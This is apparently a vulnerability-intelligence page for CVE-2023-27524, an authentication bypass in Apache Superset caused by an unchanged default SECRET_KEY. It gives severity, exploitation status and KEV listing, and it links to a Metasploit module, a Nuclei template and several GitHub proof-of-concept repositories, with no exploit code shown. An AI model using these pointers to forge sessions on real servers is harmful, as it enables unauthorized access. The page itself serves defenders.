Vulnerability detail
Enriched intelligence for a single CVE
High
CVE-2023-27524
PUBLISHEDApache Superset: Session validation vulnerability when using provided default SECRET_KEY
- Vendor
- Apache Software Foundation
- Product
- Apache Superset
- Published
- Apr 24, 2023
- EPSS
- —
Description
Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config. All superset installations should always set a unique secure random SECRET_KEY. Your SECRET_KEY is used to securely sign all session cookies and encrypting sensitive information on the database. Add a strong SECRET_KEY to your `superset_config.py` file like: SECRET_KEY = Alternatively you can set it with `SUPERSET_SECRET_KEY` environment variable.
CVSS scores
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
Exploitation status
Exploited in the wild
Recorded 2024-01-08 00:00:00 UTC · Source
SSVC decision points
- Exploitation
- active
- Automatable
- No
- Technical impact
- total
References
- https://lists.apache.org/thread/n0ftx60sllf527j7g11kmt24wvof8xyk
- https://www.openwall.com/lists/oss-security/2023/04/24/2
- https://packetstormsecurity.com/files/172522/Apache-Superset-2.0.0-Authentication-Bypass.html
- https://packetstormsecurity.com/files/175094/Apache-Superset-2.0.0-Remote-Code-Execution.html
Known exploited vulnerability sources
Catalogues that list this CVE as a known exploited vulnerability.
| Source | Added |
|---|---|
| CISA | Jan 08, 2024 |
Scanner integrations
| Scanner | Reference | Detected |
|---|---|---|
| Metasploit | https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb | Apr 28, 2025 |
| Nuclei | https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-27524.yaml | Apr 25, 2025 |
Potential proof of concepts
These PoCs are unverified and could contain malware. Use at your own risk.
github · Created 2024-05-11 12:29:08 UTC · 2 stars
Apache Superset - Authentication Bypass
github · Created 2024-05-11 12:19:55 UTC · 1 stars
Tool for finding CVE-2023-27524 (Apache Superset - Authentication Bypass)
github · Created 2023-09-08 06:15:00 UTC · 24 stars
github · Created 2023-05-08 16:50:08 UTC · 11 stars
Apache Superset Auth Bypass (CVE-2023-27524)
github · Created 2023-05-04 21:43:48 UTC · 3 stars
Perform With Apache-SuperSet Leaked Token [CSRF]
github · Created 2023-04-27 07:31:40 UTC · 3 stars
Apache Superset Auth Bypass Vulnerability CVE-2023-27524.
github · Created 2023-04-25 04:59:05 UTC · 103 stars
Basic PoC for CVE-2023-27524: Insecure Default Configuration in Apache Superset
Timeline
-
CVE ID Reserved
-
CVE Published to Public
-
Added to KEVIntel
-
Detected by Nuclei
-
Detected by Metasploit